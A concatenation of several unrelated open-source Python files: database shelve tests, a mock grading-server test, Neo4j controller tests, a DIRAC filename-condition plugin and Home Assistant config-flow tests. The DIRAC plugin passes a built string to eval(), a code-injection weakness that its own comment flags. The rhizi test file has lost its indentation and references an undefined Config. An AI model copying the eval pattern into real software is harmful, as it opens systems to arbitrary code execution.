            return bytes(key, "iso8859-1") # 8 bits

    def populateDB(self, d):
        # For each letter, store one string, one int, one list and one
        # instance; checkrec() later dispatches on the key's first char.
        for x in string.letters:
            d[self.mk('S' + x)] = 10 * x      # add a string
            d[self.mk('I' + x)] = ord(x)      # add an integer
            d[self.mk('L' + x)] = [x] * 10    # add a list

            inst = DataClass()                # add an instance
            inst.S = 10 * x
            inst.I = ord(x)
            inst.L = [x] * 10
            d[self.mk('O' + x)] = inst

    # overridable in derived classes to affect how the shelf is created/opened
    def do_open(self):
        self.d = dbshelve.open(self.filename)

    # and closed...
    def do_close(self):
        self.d.close()

    def test01_basics(self):
        """Exercise len/keys/get/put/delete and persistence across reopen."""
        if verbose:
            print '\n', '-=' * 30
            print "Running %s.test01_basics..." % self.__class__.__name__

        # Populate, then close and reopen to check the data persisted.
        self.populateDB(self.d)
        self.d.sync()
        self.do_close()
        self.do_open()
        d = self.d

        l = len(d)
        k = d.keys()
        s = d.stat()
        f = d.fd()

        if verbose:
            print "length:", l
            print "keys:", k
            print "stats:", s

        self.assertEqual(0, d.has_key(self.mk('bad key')))
        self.assertEqual(1, d.has_key(self.mk('IA')))
        self.assertEqual(1, d.has_key(self.mk('OA')))

        # Deletion via both the delete() method and del-item syntax.
        d.delete(self.mk('IA'))
        del d[self.mk('OA')]
        self.assertEqual(0, d.has_key(self.mk('IA')))
        self.assertEqual(0, d.has_key(self.mk('OA')))
        self.assertEqual(len(d), l-2)

        values = []
        for key in d.keys():
            value = d[key]
            values.append(value)
            if verbose:
                print "%s: %s" % (key, value)
            self.checkrec(key, value)

        dbvalues = d.values()
        self.assertEqual(len(dbvalues), len(d.keys()))
        import sys
        if sys.version_info[0] < 3 :
            values.sort()
            dbvalues.sort()
            self.assertEqual(values, dbvalues)
        else :  # XXX: Convert all to strings. Please, improve
            values.sort(key=lambda x : str(x))
            dbvalues.sort(key=lambda x : str(x))
            self.assertEqual(repr(values), repr(dbvalues))

        items = d.items()
        self.assertEqual(len(items), len(values))
        for key, value in items:
            self.checkrec(key, value)

        # get() default handling for a missing key.
        self.assertEqual(d.get(self.mk('bad key')), None)
        self.assertEqual(d.get(self.mk('bad key'), None), None)
        self.assertEqual(d.get(self.mk('bad key'), 'a string'), 'a string')
        self.assertEqual(d.get(self.mk('bad key'), [1, 2, 3]), [1, 2, 3])

        # With get_returns_none disabled, misses raise instead.
        d.set_get_returns_none(0)
        self.assertRaises(db.DBNotFoundError, d.get, self.mk('bad key'))
        d.set_get_returns_none(1)

        d.put(self.mk('new key'), 'new data')
        self.assertEqual(d.get(self.mk('new key')), 'new data')
        self.assertEqual(d[self.mk('new key')], 'new data')

    def test02_cursors(self):
        """Walk the shelf forward and backward with a cursor."""
        if verbose:
            print '\n', '-=' * 30
            print "Running %s.test02_cursors..." % self.__class__.__name__

        self.populateDB(self.d)
        d = self.d

        # Forward traversal must visit every record exactly once.
        count = 0
        c = d.cursor()
        rec = c.first()
        while rec is not None:
            count = count + 1
            if verbose:
                print rec
            key, value = rec
            self.checkrec(key, value)
            # Hack to avoid conversion by 2to3 tool
            rec = getattr(c, "next")()
        del c

        self.assertEqual(count, len(d))

        # Backward traversal likewise.
        count = 0
        c = d.cursor()
        rec = c.last()
        while rec is not None:
            count = count + 1
            if verbose:
                print rec
            key, value = rec
            self.checkrec(key, value)
            rec = c.prev()

        self.assertEqual(count, len(d))

        # Positioning on a specific key.
        c.set(self.mk('SS'))
        key, value = c.current()
        self.checkrec(key, value)
        del c

    def test03_append(self):
        # NOTE: this is overridden in RECNO subclass, don't change its name.
        # append() is only meaningful for RECNO databases, so here it
        # must raise.
        if verbose:
            print '\n', '-=' * 30
            print "Running %s.test03_append..." % self.__class__.__name__

        self.assertRaises(dbshelve.DBShelveError,
                          self.d.append, 'unit test was here')

    def checkrec(self, key, value):
        """Verify that a stored value matches what populateDB wrote for key."""
        # override this in a subclass if the key type is different
        import sys
        if sys.version_info[0] >= 3 :
            if isinstance(key, bytes) :
                key = key.decode("iso8859-1")  # 8 bits
        x = key[1]
        if key[0] == 'S':
            self.assertEqual(type(value), str)
            self.assertEqual(value, 10 * x)
        elif key[0] == 'I':
            self.assertEqual(type(value), int)
            self.assertEqual(value, ord(x))
        elif key[0] == 'L':
            self.assertEqual(type(value), list)
            self.assertEqual(value, [x] * 10)
        elif key[0] == 'O':
            import sys
            if sys.version_info[0] < 3 :
                from types import InstanceType
                self.assertEqual(type(value), InstanceType)
            else :
                self.assertEqual(type(value), DataClass)
            self.assertEqual(value.S, 10 * x)
            self.assertEqual(value.I, ord(x))
            self.assertEqual(value.L, [x] * 10)
        else:
            self.assert_(0, 'Unknown key type, fix the test')
#----------------------------------------------------------------------
class BasicShelveTestCase(DBShelveTestCase):
    """Variant that opens the shelf through an explicit DBShelf object.

    Concrete subclasses supply the `dbtype` and `dbflags` class
    attributes (e.g. db.DB_BTREE with db.DB_CREATE).
    """

    def do_open(self):
        self.d = dbshelve.DBShelf()
        self.d.open(self.filename, self.dbtype, self.dbflags)

    def do_close(self):
        self.d.close()
# Concrete access-method / flag combinations for BasicShelveTestCase.
class BTreeShelveTestCase(BasicShelveTestCase):
    dbtype = db.DB_BTREE
    dbflags = db.DB_CREATE

class HashShelveTestCase(BasicShelveTestCase):
    dbtype = db.DB_HASH
    dbflags = db.DB_CREATE

# DB_THREAD variants exercise the free-threaded handle mode.
class ThreadBTreeShelveTestCase(BasicShelveTestCase):
    dbtype = db.DB_BTREE
    dbflags = db.DB_CREATE | db.DB_THREAD

class ThreadHashShelveTestCase(BasicShelveTestCase):
    dbtype = db.DB_HASH
    dbflags = db.DB_CREATE | db.DB_THREAD
#----------------------------------------------------------------------
class BasicEnvShelveTestCase(DBShelveTestCase):
    """Variant that opens the shelf inside an explicit DBEnv environment."""

    def do_open(self):
        self.env = db.DBEnv()
        self.env.open(self.homeDir,
                      self.envflags | db.DB_INIT_MPOOL | db.DB_CREATE)

        # Within an environment the database path must be relative to
        # the environment home, so keep only the basename.
        self.filename = os.path.split(self.filename)[1]
        self.d = dbshelve.DBShelf(self.env)
        self.d.open(self.filename, self.dbtype, self.dbflags)

    def do_close(self):
        # Close the shelf before its environment.
        self.d.close()
        self.env.close()

    def setUp(self) :
        # Environment home must exist before DBShelveTestCase.setUp()
        # triggers do_open().
        self.homeDir = get_new_environment_path()
        DBShelveTestCase.setUp(self)

    def tearDown(self):
        import sys
        if sys.version_info[0] >= 3 :
            from test_all import do_proxy_db_py3k
            do_proxy_db_py3k(self._flag_proxy_db_py3k)
        self.do_close()
        # Remove the whole environment directory, not just the db file.
        test_support.rmtree(self.homeDir)
# Concrete access-method / flag combinations for BasicEnvShelveTestCase.
class EnvBTreeShelveTestCase(BasicEnvShelveTestCase):
    envflags = 0
    dbtype = db.DB_BTREE
    dbflags = db.DB_CREATE

class EnvHashShelveTestCase(BasicEnvShelveTestCase):
    envflags = 0
    dbtype = db.DB_HASH
    dbflags = db.DB_CREATE

# DB_THREAD variants enable free-threaded env and db handles.
class EnvThreadBTreeShelveTestCase(BasicEnvShelveTestCase):
    envflags = db.DB_THREAD
    dbtype = db.DB_BTREE
    dbflags = db.DB_CREATE | db.DB_THREAD

class EnvThreadHashShelveTestCase(BasicEnvShelveTestCase):
    envflags = db.DB_THREAD
    dbtype = db.DB_HASH
    dbflags = db.DB_CREATE | db.DB_THREAD
#----------------------------------------------------------------------
# test cases for a DBShelf in a RECNO DB.
class RecNoShelveTestCase(BasicShelveTestCase):
    """RECNO-backed shelf: keys are integers, so string test keys are
    mapped to record numbers via a per-test pool."""

    dbtype = db.DB_RECNO
    dbflags = db.DB_CREATE

    def setUp(self):
        BasicShelveTestCase.setUp(self)

        # pool to assign integer key values out of
        self.key_pool = list(range(1, 5000))
        self.key_map = {}     # map string keys to the number we gave them
        self.intkey_map = {}  # reverse map of above

    def mk(self, key):
        # Assign the next free record number on first sight of a string
        # key; subsequent calls return the same number.
        if key not in self.key_map:
            self.key_map[key] = self.key_pool.pop(0)
            self.intkey_map[self.key_map[key]] = key
        return self.key_map[key]

    def checkrec(self, intkey, value):
        # Translate the record number back to the original string key
        # before delegating to the shared verification logic.
        key = self.intkey_map[intkey]
        BasicShelveTestCase.checkrec(self, key, value)

    def test03_append(self):
        # RECNO is the one type where append() works: it allocates the
        # next record number past the current maximum.
        if verbose:
            print '\n', '-=' * 30
            print "Running %s.test03_append..." % self.__class__.__name__

        self.d[1] = 'spam'
        self.d[5] = 'eggs'
        self.assertEqual(6, self.d.append('spam'))
        self.assertEqual(7, self.d.append('baked beans'))
        self.assertEqual('spam', self.d.get(6))
        self.assertEqual('spam', self.d.get(1))
        self.assertEqual('baked beans', self.d.get(7))
        self.assertEqual('eggs', self.d.get(5))
#----------------------------------------------------------------------
def test_suite():
    """Build a TestSuite containing every shelve test case class, in
    the same order the module defines them."""
    case_classes = (
        DBShelveTestCase,
        BTreeShelveTestCase,
        HashShelveTestCase,
        ThreadBTreeShelveTestCase,
        ThreadHashShelveTestCase,
        EnvBTreeShelveTestCase,
        EnvHashShelveTestCase,
        EnvThreadBTreeShelveTestCase,
        EnvThreadHashShelveTestCase,
        RecNoShelveTestCase,
    )
    suite = unittest.TestSuite()
    for case_class in case_classes:
        suite.addTest(unittest.makeSuite(case_class))
    return suite
if __name__ == '__main__':
    # Run the full shelve suite when executed directly.
    unittest.main(defaultTest='test_suite')
| apache-2.0 |
EduPepperPD/pepper2013 | lms/djangoapps/courseware/mock_xqueue_server/test_mock_xqueue_server.py | 3 | 3099 | import mock
import unittest
import threading
import json
import urllib
import time
from mock_xqueue_server import MockXQueueServer, MockXQueueRequestHandler
from nose.plugins.skip import SkipTest
class MockXQueueServerTest(unittest.TestCase):
    '''
    A mock version of the XQueue server that listens on a local
    port and responds with pre-defined grade messages.

    Used for lettuce BDD tests in lms/courseware/features/problems.feature
    and lms/courseware/features/problems.py

    This is temporary and will be removed when XQueue is
    rewritten using celery.
    '''
    # NOTE(review): the docstring above describes the mock server, not
    # this test case; consider rewording.

    def setUp(self):

        # This is a test of the test setup,
        # so it does not need to run as part of the unit test suite
        # You can re-enable it by commenting out the line below
        raise SkipTest
        # NOTE: everything below is unreachable while the SkipTest
        # above is in place, and tearDown() is not invoked when setUp
        # raises -- so no server is left running.

        # Create the server
        server_port = 8034
        self.server_url = 'http://127.0.0.1:%d' % server_port
        self.server = MockXQueueServer(server_port,
                                       {'correct': True, 'score': 1, 'msg': ''})

        # Start the server in a separate daemon thread
        server_thread = threading.Thread(target=self.server.serve_forever)
        server_thread.daemon = True
        server_thread.start()

    def tearDown(self):
        # Stop the server, freeing up the port
        self.server.shutdown()

    def test_grade_request(self):
        """Submit a grade request and check the mock posts results back."""
        # Patch post_to_url() so we can intercept
        # outgoing POST requests from the server
        MockXQueueRequestHandler.post_to_url = mock.Mock()

        # Send a grade request
        #@begin:Change lms port to 8111
        #@date:2013-11-02
        callback_url = 'http://127.0.0.1:8111/test_callback'
        #@end

        grade_header = json.dumps({'lms_callback_url': callback_url,
                                   'lms_key': 'test_queuekey',
                                   'queue_name': 'test_queue'})

        grade_body = json.dumps({'student_info': 'test',
                                 'grader_payload': 'test',
                                 'student_response': 'test'})

        grade_request = {'xqueue_header': grade_header,
                         'xqueue_body': grade_body}

        response_handle = urllib.urlopen(self.server_url + '/xqueue/submit',
                                         urllib.urlencode(grade_request))

        response_dict = json.loads(response_handle.read())

        # Expect that the response is success
        self.assertEqual(response_dict['return_code'], 0)

        # Wait a bit before checking that the server posted back
        time.sleep(3)

        # Expect that the server tries to post back the grading info
        xqueue_body = json.dumps({'correct': True, 'score': 1,
                                  'msg': '<div></div>'})
        expected_callback_dict = {'xqueue_header': grade_header,
                                  'xqueue_body': xqueue_body}
        MockXQueueRequestHandler.post_to_url.assert_called_with(callback_url,
                                                                expected_callback_dict)
| agpl-3.0 |
yuvadm/rhizi | src/server-tests/test_db_controller.py | 4 | 15290 | # This file is part of rhizi, a collaborative knowledge graph editor.
# Copyright (C) 2014-2015 Rhizi
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import unittest
import db_controller as dbc
from db_op import DBO_add_link_set, DBO_block_chain__commit, DBO_rzdoc__clone, \
DBO_rzdb__init_DB, DBO_rzdb__fetch_DB_metablock
from db_op import DBO_add_node_set
from db_op import DBO_block_chain__list
from db_op import DBO_diff_commit__attr
from db_op import DBO_diff_commit__topo
from db_op import DBO_load_link_set
from db_op import DBO_load_node_set_by_DB_id
from db_op import DBO_match_link_id_set
from db_op import DBO_match_node_id_set
from db_op import DBO_match_node_set_by_id_attribute
from model.graph import Attr_Diff
from model.graph import Topo_Diff
from model.model import Link
from neo4j_cypher import DB_Query
from neo4j_test_util import DBO_random_data_generation
import neo4j_test_util
from neo4j_util import Neo4JException
from neo4j_util import meta_attr_list_to_meta_attr_map
from rz_config import RZ_Config
from test_util import generate_random_link_dict
from test_util import generate_random_node_dict
from test_util__pydev import debug__pydev_pd_arg
class TestDBController(unittest.TestCase):
db_ctl = None
log = None
n_map = { 'Skill': [{'id': 'skill_00', 'name': 'Kung Fu'},
{'id': 'skill_01', 'name': 'Judo'}
],
'Person': [{'id': 'person_00', 'age': 128, 'name': 'Bob'},
{'id': 'person_01', 'age': 256, 'name': 'Alice' }
]
}
l_map = { 'Knows' : [Link.link_ptr('person_00', 'skill_00'),
Link.link_ptr('person_00', 'skill_01')] }
@classmethod
def setUpClass(self):
cfg = Config.init_from_file('res/etc/rhizi-server.conf')
self.db_ctl = dbc.DB_Controller(cfg.db_base_url)
self.log = logging.getLogger('rhizi')
self.log.addHandler(logging.StreamHandler())
def setUp(self):
# flush_DB
# op = DBO_flush_db()
# self.db_ctl.exec_op(op)
# self.db_ctl.exec_op(DBO_add_node_set(self.n_map))
# self.db_ctl.exec_op(DBO_add_link_set(self.l_map))
pass
def test_add_node_set(self):
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_1, n_1_id = generate_random_node_dict(test_label)
n_map = meta_attr_list_to_meta_attr_map([n_0, n_1])
op = DBO_add_node_set(n_map)
self.assertEqual(len(op.statement_set), 1) # assert a single statement is issued
ret_id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_id_set), 2)
self.assertTrue(n_0_id in ret_id_set)
self.assertTrue(n_1_id in ret_id_set)
def test_add_link_set(self):
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_1, n_1_id = generate_random_node_dict(test_label)
n_2, n_2_id = generate_random_node_dict(test_label)
l_0, l_0_id = generate_random_link_dict(test_label, n_0_id, n_1_id)
l_1, l_1_id = generate_random_link_dict(test_label, n_0_id, n_2_id)
n_map = meta_attr_list_to_meta_attr_map([n_0, n_1, n_2])
op = DBO_add_node_set(n_map)
self.db_ctl.exec_op(op)
l_map = { test_label : [l_0, l_1]}
op = DBO_add_link_set(l_map)
self.assertEqual(len(op.statement_set), 2) # no support yet for parameterized statements for link creation
ret_id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_id_set), 2)
self.assertTrue(l_0_id in ret_id_set)
self.assertTrue(l_1_id in ret_id_set)
def test_block_chain__commit_and_print(self):
op_0 = DBO_block_chain__commit(blob_obj='blob 1')
op_1 = DBO_block_chain__commit(blob_obj='blob 2')
op_print = DBO_block_chain__list()
_, _, hash_ret1 = self.db_ctl.exec_op(op_0)
_, _, hash_ret2 = self.db_ctl.exec_op(op_1)
hash_list = self.db_ctl.exec_op(op_print)
hash_commit_0 = DBO_block_chain__commit.calc_blob_hash() # default empty blob hash
self.assertEqual(hash_list.pop(), hash_commit_0)
self.assertEqual(hash_list.pop(), hash_ret1)
self.assertEqual(hash_list.pop(), hash_ret2)
def test_db_op_statement_iteration(self):
s_arr = ['create (b:Book {title: \'foo\'}) return b',
'match (n) return n', ]
op = dbc.DB_op()
op.add_statement(s_arr[0])
op.add_statement(s_arr[1])
i = 0
for _, s, r in op:
# access: second tuple item -> REST-form 'statement' key
self.assertTrue(type(s), DB_Query)
self.assertEqual(None, r)
i = i + 1
self.db_ctl.exec_op(op)
i = 0
for _, s, r_set in op:
# access: second tuple item -> REST-form 'statement' key
self.assertNotEqual(None, r_set)
for x in r_set:
pass
i = i + 1
def test_diff_commit__topo(self):
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_1, n_1_id = generate_random_node_dict(test_label)
n_2, n_2_id = generate_random_node_dict(test_label)
l_0, l_0_id = generate_random_link_dict(test_label, n_0_id, n_1_id)
l_1, l_1_id = generate_random_link_dict(test_label, n_0_id, n_2_id)
n_set = [n_0, n_1, n_2]
l_set = [l_0, l_1]
topo_diff = Topo_Diff(node_set_add=n_set,
link_set_add=l_set)
# commit diff
op = DBO_diff_commit__topo(topo_diff)
ret_topo_diff = self.db_ctl.exec_op(op)
# test return type
self.assertTrue(hasattr(ret_topo_diff, 'node_id_set_add'))
self.assertTrue(hasattr(ret_topo_diff, 'link_id_set_add'))
self.assertTrue(hasattr(ret_topo_diff, 'node_id_set_rm'))
self.assertTrue(hasattr(ret_topo_diff, 'link_id_set_rm'))
# test return set lengths
self.assertEqual(len(ret_topo_diff.node_id_set_add), len(n_set))
self.assertEqual(len(ret_topo_diff.link_id_set_add), len(l_set))
self.assertEqual(len(ret_topo_diff.node_id_set_rm), 0)
self.assertEqual(len(ret_topo_diff.link_id_set_rm), 0)
# assert nodes persisted
id_set = self.db_ctl.exec_op(DBO_match_node_set_by_id_attribute([n_0_id, n_1_id]))
self.assertEqual(len(id_set), 2)
# assert links persisted
l_ptr_0 = Link.link_ptr(src_id=n_0_id, dst_id=n_1_id)
l_ptr_1 = Link.link_ptr(src_id=n_0_id, dst_id=n_2_id)
op = DBO_load_link_set.init_from_link_ptr_set([l_ptr_0, l_ptr_1])
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 2)
# remova links
topo_diff = Topo_Diff(link_id_set_rm=[l_0_id, l_1_id])
op = DBO_diff_commit__topo(topo_diff)
ret_topo_diff = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_topo_diff.link_id_set_rm), 2)
# assert links removed
op = DBO_load_link_set.init_from_link_ptr_set([l_ptr_0, l_ptr_1])
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
# removal nodes
topo_diff = Topo_Diff(node_id_set_rm=[n_2_id])
op = DBO_diff_commit__topo(topo_diff)
ret_topo_diff = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_topo_diff.node_id_set_rm), 1)
# assert nodes removed
op = DBO_match_node_set_by_id_attribute([n_2_id])
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
def test_diff_commit__attr(self):
# create test node
test_label = neo4j_test_util.rand_label()
n_0, n_0_id = generate_random_node_dict(test_label)
n_0['attr_0'] = 0
topo_diff = Topo_Diff(node_set_add=[n_0])
op = DBO_diff_commit__topo(topo_diff)
self.db_ctl.exec_op(op)
# apply attr_diff
attr_diff = Attr_Diff()
attr_diff.add_node_attr_write(n_0_id, 'attr_0', 0)
attr_diff.add_node_attr_write(n_0_id, 'attr_1', 'a')
attr_diff.add_node_attr_rm(n_0_id, 'attr_2')
op = DBO_diff_commit__attr(attr_diff)
ret_diff = self.db_ctl.exec_op(op)
self.assertEqual(len(ret_diff.type__node), 1)
self.assertTrue(None != ret_diff.type__node[n_0_id])
# attr-set only
attr_diff = Attr_Diff()
attr_diff.add_node_attr_write(n_0_id, 'attr_2', 0)
op = DBO_diff_commit__attr(attr_diff)
ret_diff = self.db_ctl.exec_op(op)
self.assertTrue(None != ret_diff.type__node[n_0_id]['__attr_write'].get('attr_2'))
# attr-remove only
attr_diff = Attr_Diff()
attr_diff.add_node_attr_rm(n_0_id, 'attr_2')
op = DBO_diff_commit__attr(attr_diff)
ret_diff = self.db_ctl.exec_op(op)
self.assertTrue('attr_2' in ret_diff.type__node[n_0_id]['__attr_remove'])
def test_load_link_set(self):
# load by l_ptr
l_ptr = Link.link_ptr(src_id='person_00', dst_id='skill_00')
op = DBO_load_link_set.init_from_link_ptr(l_ptr)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 1)
l_ptr = Link.link_ptr(src_id='person_00')
op = DBO_load_link_set.init_from_link_ptr(l_ptr)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 2)
l_ptr = Link.link_ptr(dst_id='skill_00')
op = DBO_load_link_set.init_from_link_ptr(l_ptr)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 1)
# load by l_ptr sets
l_ptr_set = [Link.link_ptr(s, d) for (s, d) in [('person_00', 'skill_00'), ('person_00', 'skill_01')]]
op = DBO_load_link_set.init_from_link_ptr_set(l_ptr_set)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 2)
# this should return the same link twice
l_ptr_set = [Link.link_ptr(s, d) for (s, d) in [('person_00', 'skill_00'), ('person_00', 'skill_01')]]
l_ptr_set.append(Link.link_ptr(dst_id='skill_00'))
op = DBO_load_link_set.init_from_link_ptr_set(l_ptr_set)
l_set = self.db_ctl.exec_op(op)
self.assertEqual(len(l_set), 3)
def test_load_node_set_by_DB_id(self):
"""
test node DB id life cycle
"""
# create nodes, get DB ids
op = DBO_add_node_set({'T_test_load_node_set_by_DB_id': [{'name': 'John Doe'},
{'name': 'John Doe'}]})
id_set = self.db_ctl.exec_op(op)
# match against DB ids
op = DBO_load_node_set_by_DB_id(id_set)
n_set = self.db_ctl.exec_op(op)
self.assertEqual(len(n_set), len(id_set), 'incorrect result size')
def test_match_node_set_by_type(self):
op = DBO_match_node_id_set(filter_label='Person')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 2)
op = DBO_match_node_id_set(filter_label='Nan_Type')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
def test_match_node_set_by_attribute(self):
fam = { 'name': ['Bob', u'Judo'], 'age': [128] }
n_set = self.db_ctl.exec_op(DBO_match_node_id_set(filter_attr_map=fam))
self.assertEqual(len(n_set), 1)
fam = { 'age': [128, 256, 404] }
n_set = self.db_ctl.exec_op(DBO_match_node_id_set(filter_attr_map=fam))
self.assertEqual(len(n_set), 2)
def test_match_node_set_by_DB_id(self):
pass # TODO
def test_match_node_set_by_id_attribute(self):
n_set = self.db_ctl.exec_op(DBO_match_node_set_by_id_attribute(['skill_00', 'person_01']))
self.assertEqual(len(n_set), 2)
def test_match_link_set_by_type(self):
op = DBO_match_link_id_set(filter_label='Knows')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 2)
op = DBO_match_link_id_set(filter_label='Nan_Type')
id_set = self.db_ctl.exec_op(op)
self.assertEqual(len(id_set), 0)
def test_partial_query_set_execution_success(self):
"""
test:
- statement execution stops at first invalid statement
- assert create statement with result data does not actually persist in DB
From the REST API doc: 'If any errors occur while executing statements,
the server will roll back the transaction.'
"""
n_id = 'test_partial_query_set_execution_success'
op = dbc.DB_op()
op.add_statement("create (n:Person {id: '%s'}) return n" % (n_id), {}) # valid statement
op.add_statement("match (n) return n", {}) # valid statement
op.add_statement("non-valid statement #1", {})
op.add_statement("non-valid statement #2", {})
self.assertRaises(Neo4JException, self.db_ctl.exec_op, op)
self.assertEqual(len(op.result_set), 2)
self.assertEqual(len(op.error_set), 1)
# assert node creation did not persist
n_set = self.db_ctl.exec_op(DBO_match_node_set_by_id_attribute([n_id]))
self.assertEqual(len(n_set), 0)
def test_rz_clone(self):
    """Seed random nodes/links, then clone the rzdoc and check the resulting
    topo diff is non-empty."""
    # prob_link_create biases the generator toward creating links
    op = DBO_random_data_generation(lim_n=8, lim_r=16, prob_link_create=0.7)
    n_label = op.node_set_label
    l_label = op.link_set_label
    self.db_ctl.exec_op(op)  # commit random data

    op = DBO_rzdoc__clone(filter_label=n_label, limit=32)
    topo_diff = self.db_ctl.exec_op(op)
    n_set = topo_diff.node_set_add
    l_set = topo_diff.link_set_add

    # TODO improve assertions
    self.assertTrue(0 < len(n_set))
    self.assertTrue(0 < len(l_set))
def test_rzdb__init_DB(self):
    """DB initialization must succeed on the first call and fail when repeated."""
    rz_cfg = RZ_Config.generate_default()
    op = DBO_rzdb__init_DB(rz_cfg.rzdoc__mainpage_name)

    try:  # assert first init call passes
        self.db_ctl.exec_op(op)
    except Exception:
        # narrowed from a bare 'except:' which would also swallow
        # KeyboardInterrupt/SystemExit
        self.fail()

    try:  # assert second init call fails
        self.db_ctl.exec_op(op)
    except Exception:
        return
    self.fail()
def test_rzdb__fetch_DB_metadata(self):
    """Fetch the DB metablock and print it for manual inspection."""
    # Bug fix: the original called Config.generate_default(), but the class is
    # imported as RZ_Config in this suite (see test_rzdb__init_DB), so this
    # line raised NameError before the op ever ran.
    rz_cfg = RZ_Config.generate_default()  # NOTE(review): result unused - confirm no needed side effect
    op = DBO_rzdb__fetch_DB_metablock()
    dbmb = self.db_ctl.exec_op(op)
    print('%s' % (dbmb))
def tearDown(self): pass  # no per-test cleanup; DB state is shared across tests
@debug__pydev_pd_arg
def main():
    # Runs a single selected test by default; adjust defaultTest to run others.
    unittest.main(defaultTest='TestDBController.test_rzdb__fetch_DB_metadata', verbosity=2)

if __name__ == "__main__":
    main()
| agpl-3.0 |
chaen/DIRAC | Resources/Catalog/ConditionPlugins/FilenamePlugin.py | 4 | 1394 | """
Defines the plugin to perform evaluation on the lfn name
"""
__RCSID__ = "$Id $"
from DIRAC.Resources.Catalog.ConditionPlugins.FCConditionBasePlugin import FCConditionBasePlugin
class FilenamePlugin( FCConditionBasePlugin ):
  """
  This plugin is to be used when filtering based on the LFN name
  """

  def __init__( self, conditions ):
    """ the condition can be any method of the python string object that can be evaluated
        as True or False:
          * endswith
          * find
          * isalnum
          * isalpha
          * isdigit
          * islower
          * isspace
          * istitle
          * isupper
          * startswith

        It should be written just like if you were calling the python call yourself.

        For example::

          Filename=startswith('/lhcb')
          Filename=istitle()
    """
    super( FilenamePlugin, self ).__init__( conditions )

  def eval( self, **kwargs ):
    """ evaluate the parameters. The lfn argument is mandatory

        :returns: boolean result of applying self.conditions to the lfn;
                  False when no lfn is given or the evaluation fails
    """
    lfn = kwargs.get( 'lfn' )
    if not lfn:
      return False

    # SECURITY NOTE: self.conditions is interpolated into eval(), so a
    # malicious condition string (or an lfn containing a quote) can run
    # arbitrary code. Conditions must come from trusted configuration only.
    evalStr = "'%s'.%s" % ( lfn, self.conditions )

    try:
      ret = eval( evalStr )
      # Special case of 'find' which returns -1 if the pattern does not exist
      if self.conditions.startswith( 'find(' ):
        ret = ( ret != -1 )
      return ret
    except Exception:
      # narrowed from a bare 'except:' so SystemExit/KeyboardInterrupt propagate
      return False
| gpl-3.0 |
mezz64/home-assistant | tests/components/ovo_energy/test_config_flow.py | 2 | 3180 | """Test the OVO Energy config flow."""
import aiohttp
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.ovo_energy.const import DOMAIN
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import HomeAssistant
from tests.async_mock import patch
FIXTURE_USER_INPUT = {CONF_USERNAME: "example@example.com", CONF_PASSWORD: "something"}
async def test_show_form(hass: HomeAssistant) -> None:
    """Test that the setup form is served."""
    init_result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )

    assert init_result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert init_result["step_id"] == "user"
async def test_authorization_error(hass: HomeAssistant) -> None:
    """Test we show user form on connection error."""
    result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )

    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"

    # authenticate() returning False means bad credentials (not a transport error)
    with patch(
        "homeassistant.components.ovo_energy.config_flow.OVOEnergy.authenticate",
        return_value=False,
    ):
        result2 = await hass.config_entries.flow.async_configure(
            result["flow_id"],
            FIXTURE_USER_INPUT,
        )

    # flow must re-show the form with an invalid_auth error
    assert result2["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result2["step_id"] == "user"
    assert result2["errors"] == {"base": "invalid_auth"}
async def test_connection_error(hass: HomeAssistant) -> None:
    """Test we show user form on connection error."""
    init_result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )

    assert init_result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert init_result["step_id"] == "user"

    auth_target = (
        "homeassistant.components.ovo_energy.config_flow.OVOEnergy.authenticate"
    )
    with patch(auth_target, side_effect=aiohttp.ClientError):
        configure_result = await hass.config_entries.flow.async_configure(
            init_result["flow_id"],
            FIXTURE_USER_INPUT,
        )

    assert configure_result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert configure_result["step_id"] == "user"
    assert configure_result["errors"] == {"base": "cannot_connect"}
async def test_full_flow_implementation(hass: HomeAssistant) -> None:
    """Test registering an integration and finishing flow works."""
    result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )

    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"

    # successful authentication lets the flow create the config entry
    with patch(
        "homeassistant.components.ovo_energy.config_flow.OVOEnergy.authenticate",
        return_value=True,
    ):
        result2 = await hass.config_entries.flow.async_configure(
            result["flow_id"],
